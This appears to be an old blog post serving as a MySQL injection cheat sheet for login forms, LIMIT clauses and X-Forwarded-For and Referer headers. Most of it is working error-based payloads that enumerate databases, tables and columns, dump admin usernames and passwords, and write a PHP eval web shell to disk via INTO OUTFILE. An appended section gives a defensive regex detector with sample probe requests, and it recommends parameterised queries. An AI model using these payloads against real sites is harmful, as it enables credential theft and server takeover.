Login-form injection, admin back-end injection, LIMIT injection, X-Forwarded-For injection, Referer injection: constructing MySQL statements
2013-02-02 13:55
Statement model:
and(select 1 from(select count(*),concat((select concat(<injected expression>) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Dumping some information about the site:
and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>0
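Dumping data; relevant functions:
system_user(): system user name
user(): user name
current_user: current user name
session_user(): user name used to connect to the database
database(): database name
version(): MySQL database version
load_file(): MySQL function that reads a local file
@@datadir: database data directory path
@@basedir: MySQL installation path
@@version_compile_os: operating system
information_schema.schemata: table of database names
information_schema.tables: table of table names
information_schema.columns: column names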
'and(select 1 from(select count(*),concat((select concat(<function 1>,0x20,<function 2>,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2. Dumping tables
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of the database name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of the database name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of the database name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
.......

3. Dumping columns
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of the table name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of the table name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of the table name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........

4. Dumping user names and passwords
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........
' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #
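An added detection example, not from the original post: the statements above share a few fixed shapes (the `floor(rand(0)*2)` ... `group by` double query, reads of `information_schema`, `INTO OUTFILE`, `load_file()`), so a defender can flag them in any request field, including the `X-Forwarded-For` and `Referer` headers named in the title. The rule names, the sample requests and the placeholder file path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the statement shapes quoted in this post (illustrative, not a full rule set).
RULES = {
    "error_based_double_query": re.compile(r"floor\(rand\(\d*\)\*2\).*group by"),
    "schema_enumeration": re.compile(r"information_schema\.(schemata|tables|columns)"),
    "file_write": re.compile(r"into (out|dump)file"),
    "file_read": re.compile(r"load_file\("),
}

def normalize(value: str) -> str:
    """URL-decode twice, drop backticks, lowercase, collapse whitespace and spacing around punctuation."""
    for _ in range(2):  # second pass catches double-encoded input
        value = unquote_plus(value)
    value = re.sub(r"\s+", " ", value.replace("`", "").lower())
    return re.sub(r" ?([().,*]) ?", r"\1", value)

def scan_request(fields: dict) -> list:
    """Return sorted (field, rule) pairs for every input field that matches a signature."""
    hits = []
    for name, raw in fields.items():
        text = normalize(raw)
        hits += [(name, rule) for rule, rx in RULES.items() if rx.search(text)]
    return sorted(hits)

# Constructed sample requests: parameters and headers flattened into one dict per request.
BENIGN = {"username": "alice", "X-Forwarded-For": "203.0.113.7",
          "Referer": "https://example.com/login?next=/tables"}
# Header value follows the statement model quoted in the post.
XFF_PROBE = {"username": "alice",
             "X-Forwarded-For": "1'and(select 1 from(select count(*),concat(version(),"
                                "floor(rand(0)*2))x from `information_schema`.tables group by x)a)and'"}
# URL-encoded login field; the output path is a harmless placeholder.
LOGIN_WRITE = {"username": "%27%20or%201%20AND%20(SELECT%20id%20FROM%20the_users%20limit%201"
                           "%20INTO%20OUTFILE%20%27/tmp/placeholder.txt%27)%20%23"}

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("xff", XFF_PROBE), ("login", LOGIN_WRITE)):
        print(label, scan_request(req))
```

Matching like this is a detection aid for logs and request inspection; the fix for every injection point listed in the title is to bind user input as query parameters and to run the application's database account without the FILE privilege.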